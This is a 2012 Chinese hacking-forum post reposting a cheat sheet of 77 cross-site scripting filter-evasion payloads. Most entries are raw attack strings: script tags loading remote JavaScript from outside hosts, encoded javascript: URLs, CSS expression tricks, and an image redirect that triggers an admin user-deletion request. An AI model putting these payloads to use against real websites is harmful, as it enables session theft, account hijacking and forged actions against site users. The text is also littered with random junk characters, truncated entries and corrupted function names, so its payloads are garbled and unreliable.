貌似关于xss的资料t00ls比较少,看见好东西Copy过来,不知道有木有童鞋需要Mark的。
5 P+ s# F0 {3 E( t, e8 O0 m6 o& M# c! | ~6 k
(1)普通的XSS JavaScript注入
9 t3 W6 r c! K, F; _ <SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
0 T) z' z/ p% D/ N
. Z; U; g/ E0 l+ V+ s (2)IMG标签XSS使用JavaScript命令
% J9 V% Z' {! e" Z <SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>; N( X( F4 Q# S" ~' [5 \
( [7 o# R# Y8 ~6 ]! E! b2 @! h (3)IMG标签无分号无引号
+ W0 I8 W& `1 b: W9 z5 g, I4 P <IMG SRC=javascript:alert(‘XSS’)>& J3 u( E. C8 N
1 O1 s& ~+ _2 j2 {7 c& w
(4)IMG标签大小写不敏感
- A5 T( {% [! R" f9 k+ [) a6 u2 b6 b8 z <IMG SRC=JaVaScRiPt:alert(‘XSS’)>$ v) i. Y* ~1 g6 A
. d( j4 ]& q0 Y5 _
(5)HTML编码(必须有分号)
9 \. O2 [% e3 I# { <IMG SRC=javascript:alert(“XSS”)>* Y- y$ x2 s& N' O9 l$ w
$ p) e4 q" U2 g, q+ C( a) M. m
(6)修正缺陷IMG标签; F" P/ T( a0 D/ b
<IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>
, N9 m/ U/ N8 s$ q/ l8 X0 s& Y8 `! p' A A" |# \3 E
(7)formCharCode标签(计算器)
b; @* x3 I7 \ x4 L3 }3 z <IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>; Y6 H# z, b5 i# F& I
* |- E9 e7 Z+ Q* l! T& L! C (8)UTF-8的Unicode编码(计算器)
+ {! P0 k7 ^7 r& p0 {& ` <IMG SRC=jav..省略..S')>
( O: X$ g0 f/ P2 Z0 i# Z; @. H {/ R3 M
(9)7位的UTF-8的Unicode编码是没有分号的(计算器)8 F4 c/ D7 G& Z9 [$ Y
<IMG SRC=jav..省略..S')>
3 y9 M( f; `; F/ X
" ~, F/ B7 I; w/ `2 \* t (10)十六进制编码也是没有分号(计算器)
, T' b0 M% \# _$ |/ D <IMG SRC=java..省略..XSS')>1 f1 Y+ k( `9 E0 S& K' {# `# E
! I* V% t8 z- K& Q( a3 L (11)嵌入式标签,将Javascript分开
# i. }5 Y. v+ j; A+ p <IMG SRC=”jav ascript:alert(‘XSS’);”>/ I; I/ T" L$ o* f- w1 d
8 W; A6 V$ Z- F9 g* J0 M (12)嵌入式编码标签,将Javascript分开) b. D: `* O9 l" S
<IMG SRC=”jav ascript:alert(‘XSS’);”>2 w2 z R: S1 ~4 i. r1 ?+ W$ p, G
: E& F4 f& P. z3 B. B, t (13)嵌入式换行符8 K1 `. i! a6 p, ^2 v
<IMG SRC=”jav ascript:alert(‘XSS’);”>
5 N7 T0 l0 w" W6 i
8 m! E5 C/ E' q0 u0 ~( ` (14)嵌入式回车
1 Q% r5 F3 H' H( G <IMG SRC=”jav ascript:alert(‘XSS’);”>
: b* p0 S# _4 X% H- y5 w. v9 R/ B. @2 [( d
(15)嵌入式多行注入JavaScript,这是XSS极端的例子
- J5 `$ U# O, D7 a+ {; Y4 S6 O <IMG SRC=”javascript:alert(‘XSS‘)”>1 t4 s' E/ I" h3 A
# U% z ^8 k! o6 X6 T/ R
(16)解决限制字符(要求同页面)
$ ?- \; L5 r+ l! ]+ b9 f+ L <script>z=’document.’</script>
, F2 L0 X+ _5 {) ?; M% k- b: x6 N <script>z=z+’write(“‘</script>: J( W1 [8 H/ [
<script>z=z+’<script’</script>
$ B' y8 g! Y1 g <script>z=z+’ src=ht’</script>
9 q; x; R$ b! R9 `! ^9 _+ o4 V <script>z=z+’tp://ww’</script>
& m/ Q0 z1 K$ ]! P$ D <script>z=z+’w.shell’</script>
6 I& B \# u% y2 \3 R: v" D4 H <script>z=z+’.net/1.’</script>
1 Z& D" w d* _6 ]" f) P <script>z=z+’js></sc’</script>; c7 a9 M$ X/ |0 r% [' S& Y ~7 P
<script>z=z+’ript>”)’</script>) Q" {& F2 M% l, J
<script>eval_r(z)</script>
8 G! w, d# z1 V6 T9 c: r. w# ]; W; ?
(17)空字符4 d, p( ?4 c2 Q4 R% z0 S, v
perl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out0 W5 u8 s8 V" p, Y1 t" F, M9 i
! P) l" u# \! Z
(18)空字符2,空字符在国内基本没效果.因为没有地方可以利用
0 Y K, s8 N) F) T/ D perl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out/ p0 K7 |& x5 G
# `( b: o P! y! R- B (19)Spaces和meta前的IMG标签 E8 U0 ~; |4 Z- M7 t
<IMG SRC=” � javascript:alert(‘XSS’);”>
* n( I- a, s: m0 h# M* }
: I! T: ^3 i" I (20)Non-alpha-non-digit XSS
6 t2 A. l- n' V4 W' ^* }% b+ r <SCRIPT/XSS SRC=”http://3w.org/XSS/xss.js”></SCRIPT>
+ H/ Q' J5 B. M
# `; U4 e. `) Y2 C (21)Non-alpha-non-digit XSS to 28 M# e/ v4 X- ]5 J) ?. L
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>
3 ^# G7 q9 V$ W
0 E5 b' ]+ c, C8 O* I2 v! A! ] (22)Non-alpha-non-digit XSS to 3: H7 M) O4 {* a
<SCRIPT/SRC=”http://3w.org/XSS/xss.js”></SCRIPT>* c( p0 a5 L# _: G' c3 \# I
* @8 |- B# z" I, c: W' Q% e
(23)双开括号
3 ?" g4 z7 s9 p* [% @$ l <<SCRIPT>alert(“XSS”);//<</SCRIPT>3 x' ]/ r! e+ J) v- _$ P: X
% \2 L, y! r( D% m2 ~# ~ (24)无结束脚本标记(仅火狐等浏览器)4 a$ [1 H5 {3 t: i& e
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>
" ?: ~; {4 Y. r P7 u9 o) W: k7 n) x9 e9 I: d
(25)无结束脚本标记2* m1 [- @7 D9 Z
<SCRIPT SRC=//3w.org/XSS/xss.js>
' |7 y# Q0 L! l& A! ]) y
7 n2 s. R) n: ?, { (26)半开的HTML/JavaScript XSS
% R+ Y1 K" W+ F+ l <IMG SRC=”javascript:alert(‘XSS’)”
5 e3 Y+ e5 h2 D0 m/ o/ @
8 M- ~9 v. c7 [) x/ m5 _6 T (27)双开角括号& O3 p/ Z1 ?& Y% l
<iframe src=http://3w.org/XSS.html <
" g' c- B6 R( x1 s( l
" P4 w" r7 G2 N! v9 G+ @/ ~ (28)无单引号 双引号 分号" s0 D! m" q% m* Y
<SCRIPT>a=/XSS/
+ G* D& z& u \! D2 R alert(a.source)</SCRIPT>9 H3 [7 [* A- J7 z
- S( T% S1 F y% {9 u/ `8 S+ B
(29)换码过滤的JavaScript& w( b7 g- N- {; a5 }2 J9 y5 B
\”;alert(‘XSS’);//
# Y% ~: N7 J. g; ]& S4 [0 ]/ |' X6 H0 x( v* s
(30)结束Title标签
# y K6 T$ b; v4 @ </TITLE><SCRIPT>alert(“XSS”);</SCRIPT>
& _9 M; x) p: Q& }0 m* S0 `! T7 G/ Z9 m: V2 R0 Y
(31)Input Image
8 n, }0 e v: C6 V( F, J <INPUT SRC=”javascript:alert(‘XSS’);”>1 O) @ i: t; ~( K. y
' v6 `9 {) w" {. K( @
(32)BODY Image, h0 ?+ R w& P' {! S9 o, U
<BODY BACKGROUND=”javascript:alert(‘XSS’)”>/ `+ E8 t% A# e. w6 N' G+ _
6 b& A% c6 B( H5 y( _% g
(33)BODY标签
( e o/ ?+ Q- }4 q5 @# A <BODY(‘XSS’)>- ?$ q; W" U! S. h N( v
$ e5 B* B# `! O
(34)IMG Dynsrc* Z% L2 o# w3 U
<IMG DYNSRC=”javascript:alert(‘XSS’)”>
( a9 z' p. b/ K2 O U3 ^. [5 l$ o$ V3 ]$ G
(35)IMG Lowsrc
* ]0 ^, M* {/ C& \2 E* Q# @ <IMG LOWSRC=”javascript:alert(‘XSS’)”>
$ h' u4 h6 m7 d7 a0 R2 X u
4 \. ?, k* Z F' C' n& W& r% h (36)BGSOUND
+ q9 d; A9 N f- p9 i. i6 J <BGSOUND SRC=”javascript:alert(‘XSS’);”>
. M. o9 r6 ]% o
2 p3 y/ T2 p7 i0 G (37)STYLE sheet
4 B9 P! G5 l5 \ B& Y" m <LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>! |# F5 O; B1 |) k) j5 ]0 U! \
& V. r! }( x7 W# |1 Y (38)远程样式表% q, B/ n Q9 F6 M" F" E
<LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”>
2 j5 v1 r) _/ s! G# ]8 Z; t3 e# L7 t/ z! X+ o! h2 @: W
(39)List-style-image(列表式)) M6 ?% |" O a& M9 v0 J5 \" G: f
<STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS) Q/ }+ }4 ^. k0 o
9 y" z) P* X7 Y1 u$ \3 Y+ `
(40)IMG VBscript2 b J- M% B0 D7 @" X$ @
<IMG SRC=’vbscript:msgbox(“XSS”)’></STYLE><UL><LI>XSS# Y5 h( U* J/ `
/ Q( N5 } F6 V% g5 w! G/ a. D0 Y1 p (41)META链接url. Z0 J' Z- g& Y8 `5 Y% m
<META HTTP-EQUIV=”refresh” CONTENT=”0; URL=http://;URL=javascript:alert(‘XSS’);”>
7 J' Y' }" P/ j1 P" Q5 j4 a
1 u1 {8 ?' \/ c( n9 A (42)Iframe
+ e6 w7 s$ C$ ]1 r- O% l2 g. w) M0 p <IFRAME SRC=”javascript:alert(‘XSS’);”></IFRAME>
6 w+ T; A! X3 c5 }$ j1 u, |" x: D$ D4 I: r
(43)Frame1 [" z: ^7 g7 A$ m& F$ |
<FRAMESET><FRAME SRC=”javascript:alert(‘XSS’);”></FRAMESET>
9 u8 E. Z- |5 ~' w: D( W( T1 r% t7 J* g# G
(44)Table7 L; x i: o" Z& m+ ?: i
<TABLE BACKGROUND=”javascript:alert(‘XSS’)”>, T( |+ M/ {& s i/ g2 |, G d
3 `$ F3 j6 O) f0 u" n
(45)TD
; [( }( w5 n5 R. G5 ]1 B <TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>) Q/ \2 c" N7 j! d/ t
/ U# U! [0 b% g& v: E
(46)DIV background-image5 |. }0 S/ s$ Y0 M J; T
<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>4 O+ H$ S4 [5 z0 H
% X( p. F+ w2 D/ v# K8 x& f: c (47)DIV background-image后加上额外字符(1-32&34&39&160&8192-8&13&12288&65279). u6 T, o( N# w
<DIV STYLE=”background-image: url(�javascript:alert(‘XSS’))”>& J7 H9 m% C. U. H
! P% S0 b5 k& ?7 K
(48)DIV expression( o- U' Q* M) o+ c
<DIV STYLE=”width: expression_r(alert(‘XSS’));”>
# Q; W8 d' v$ D" C
e I( `/ P$ r, X (49)STYLE属性分拆表达
! g8 i" Z- s, v, ~. Z! j4 P6 q <IMG STYLE=”xss:expression_r(alert(‘XSS’))”>
5 l% M2 p! k1 h! E* [3 }9 E* @ M: m6 j. l* ^* \
(50)匿名STYLE(组成:开角号和一个字母开头)2 R( ?8 ?/ L& F% P! d
<XSS STYLE=”xss:expression_r(alert(‘XSS’))”>
- k, O$ r1 j$ I: n/ u) ~$ r! x+ T8 m9 F4 H$ f5 c
(51)STYLE background-image
4 X' ]$ Z5 B+ N) ~/ T+ S, w s <STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A CLASS=XSS></A>
4 N) ~# N) y& T; f6 V' W
" e$ N2 E8 y6 F% n (52)IMG STYLE方式
, t) U s1 t& i* s exppression(alert(“XSS”))’>
- ?2 u* R- h" k+ e( C4 C% @9 y. a; g" _8 T! I
(53)STYLE background
. f9 `% a O, C, x$ u7 t <STYLE><STYLE type=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>
- u2 T7 G, D. X6 I- h9 ]9 ~% H% N# y) i4 e
(54)BASE) C" Z x% @1 F5 {, b. r6 a/ K
<BASE HREF=”javascript:alert(‘XSS’);//”>
% L1 w/ [; J7 M9 F2 G$ n# p9 q
/ S1 ]4 S3 @6 @9 t (55)EMBED标签,你可以嵌入FLASH,其中包涵XSS
0 ?) k& b! G. B. y <EMBED SRC=”http://3w.org/XSS/xss.swf” ></EMBED>2 m1 R; z6 G0 L# w) B! @
" |# Y& v' X) v5 h8 }, ~+ n
(56)在flash中使用ActionScrpt可以混进你XSS的代码
8 o. g5 N' e$ {- @; F7 N- ^0 D+ [! k a=”get”;0 u1 I; D1 R2 \8 l- ]
b=”URL(\”";' E1 ?& x2 @1 ] v
c=”javascript:”;
5 s& C, s1 k, v# Q d=”alert(‘XSS’);\”)”;# i/ }1 q3 I' s0 C1 _
eval_r(a+b+c+d);
' G3 h* V7 }% V1 H; X
& `4 A- X! J, `1 n* A+ @6 p7 h (57)XML namespace.HTC文件必须和你的XSS载体在一台服务器上5 E. F7 F2 I# S" k2 S& z6 P5 ~
<HTML xmlns:xss>8 M% X2 D( f8 i& B9 o8 c5 c4 G4 Y$ E
<?import namespace=”xss” implementation=”http://3w.org/XSS/xss.htc”>
2 N; C& T% _- _! j C <xss:xss>XSS</xss:xss>
7 m; i( x1 Z N9 f! E' T/ B. Q </HTML>
1 g* \5 m3 r* S2 F3 `* s- _
& O/ }- V( d! k! g3 u (58)如果过滤了你的JS你可以在图片里添加JS代码来利用4 w9 R' u8 I- J7 A1 n* M5 G; t: t
<SCRIPT SRC=””></SCRIPT>
9 E8 T# _+ ~' b% d
4 X0 Y/ G! V* j4 H (59)IMG嵌入式命令,可执行任意命令
% X7 h' E) \) f& |7 o <IMG SRC=”http://www.XXX.com/a.php?a=b”>/ ^7 w- Q$ S/ Q8 {5 n
& a4 c" }: c( M; c
(60)IMG嵌入式命令(a.jpg在同服务器)
9 i. s! s4 u! y1 n Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser
1 [8 s7 R8 m* o6 W! \, E
- |$ y/ \6 Z) ^/ T% P (61)绕符号过滤2 k9 `% A" |) J7 O) ]/ v
<SCRIPT a=”>” SRC=”http://3w.org/xss.js”></SCRIPT>( n; J* K0 ]0 _( S- G A
4 J2 M" e( n# o, C
(62)
* {6 r$ p% }4 B: R <SCRIPT =”>” SRC=”http://3w.org/xss.js”></SCRIPT>* { W5 C( B1 o" `
5 Y4 {. b m0 h1 N7 ]
(63)
2 h4 |. I% F9 z <SCRIPT a=”>” ” SRC=”http://3w.org/xss.js”></SCRIPT>2 A X- K% i% m2 w
' ?- K3 Y4 A$ s F# p. \9 R (64)
4 B% Y1 G1 z! l7 t7 ?) v- B <SCRIPT “a=’>’” SRC=”http://3w.org/xss.js”></SCRIPT>
7 C' I% c! W4 z/ y1 K) Q( \
3 _: f1 o H: ]$ g; F1 [ (65)1 n' M* q d6 z
<SCRIPT a=`>` SRC=”http://3w.org/xss.js”></SCRIPT>
, t+ x% r3 L/ u! p, C* G/ y: y- \* j, j5 S% g; ~, W
(66)
" k1 \8 ^; I9 \6 @; u <SCRIPT a=”>’>” SRC=”http://3w.org/xss.js”></SCRIPT>
2 S6 }) S* j" V/ D9 n6 C9 p& L4 V0 K( q2 l
(67)
1 J4 R7 {& {) G# P7 I% } <SCRIPT>document.write(“<SCRI”);</SCRIPT>PT SRC=”http://3w.org/xss.js”></SCRIPT>* @0 _8 h7 A2 _* A3 g
1 ^' v0 d+ p2 E0 f- c4 P3 b (68)URL绕行
* [9 \$ b6 i; _% v4 V7 R; f: r. k <A HREF=”http://127.0.0.1/”>XSS</A>
- c* l/ d$ ^) [4 q2 U. p) Y* w( }, n* o2 F
(69)URL编码
3 `& X- s2 q& T% `- } <A HREF=”http://3w.org”>XSS</A>/ E1 u% |/ r% f" w
. ]2 C: T( X8 U( d: \- B Y (70)IP十进制' l% M4 V: q$ a: {/ d Q/ t4 C8 g4 S# A' o
<A HREF=”http://3232235521″>XSS</A>9 V! h" Q i6 c
0 _: J+ u6 A* h- Z (71)IP十六进制
2 k, u4 M# Z1 \( K2 ` <A HREF=”http://0xc0.0xa8.0×00.0×01″>XSS</A>% x/ K8 J- E5 O' w
; F& b* W0 L. X1 p6 G& I) L
(72)IP八进制
]" `1 f0 J2 S% C, p, P7 N <A HREF=”http://0300.0250.0000.0001″>XSS</A>
4 u9 A0 j) O( G9 c9 D8 m1 Y( h! l% n1 j3 J4 i
(73)混合编码 t& ?" M m7 y
<A HREF=”h2 Y! q5 F- ^' \2 u8 ?2 l* o% A
tt p://6 6.000146.0×7.147/”">XSS</A>, h6 v: w# w2 H; H- |+ J5 h, P/ `3 i
) d8 `; L* s$ l
(74)节省[http:]; x/ J. m( d8 ?8 R; X# y" q
<A HREF=”//www.google.com/”>XSS</A>
% D6 F; v/ V0 {' j3 k: F6 A. a& a6 P1 [. M3 W& u2 A
(75)节省[www]
7 L8 i( i7 v, x <A HREF=”http://google.com/”>XSS</A>9 Y/ K3 s: K: m/ c/ S0 N, k6 X
9 z2 U' B8 x0 C7 p (76)绝对点绝对DNS
' n$ Q% ^, [- j7 v <A HREF=”http://www.google.com./”>XSS</A>/ w6 [- f9 j; a+ S* l
/ X3 s3 \; O7 \4 q& D0 ~$ s. J (77)javascript链接1 V; B7 G# j, @8 y1 ]% {, T
<A HREF=”javascript:document.location=’http://www.google.com/’”>XSS</A> |
发表于 2012-9-5 14:56:34
收藏
支持
反对